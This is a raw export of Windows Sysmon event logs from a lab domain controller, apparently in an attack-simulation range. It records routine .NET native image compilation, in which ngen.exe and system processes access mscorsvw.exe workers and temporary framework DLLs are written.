13:51:04.882{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9248-6005-4604-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.867{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9248-6005-4604-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:04.867{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9248-6005-4604-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:04.804{59A5CD1D-9248-6005-4504-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\109c-0\System.IO.Compression.FileSystem.dll2021-01-18 13:51:04.804 10341000x80000000000000008555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:04.773{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9248-6005-4504-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.757{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9248-6005-4504-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:04.757{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9248-6005-4504-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:04.726{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9248-6005-4404-00000000A301}3464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.710{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9248-6005-4404-00000000A301}3464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:04.710{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9248-6005-4404-00000000A301}3464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:04.648{59A5CD1D-9248-6005-4304-00000000A301}4880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1310-0\System.IO.Compression.dll2021-01-18 13:51:04.648 10341000x80000000000000008548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:04.554{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9248-6005-4304-00000000A301}4880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.539{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9248-6005-4304-00000000A301}4880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:04.539{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9248-6005-4304-00000000A301}4880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:04.507{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9248-6005-4204-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.492{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9248-6005-4204-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:04.492{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9248-6005-4204-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:04.414{59A5CD1D-9247-6005-4104-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\9b4-0\System.IdentityModel.Services.dll2021-01-18 13:51:04.414 10341000x80000000000000008572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:05.804{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9249-6005-4A04-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:05.788{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9249-6005-4A04-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:05.788{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9249-6005-4A04-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:05.710{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9249-6005-4904-00000000A301}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:05.695{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9249-6005-4904-00000000A301}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:05.695{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9249-6005-4904-00000000A301}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:05.273{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9249-6005-4804-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:05.257{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9249-6005-4804-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
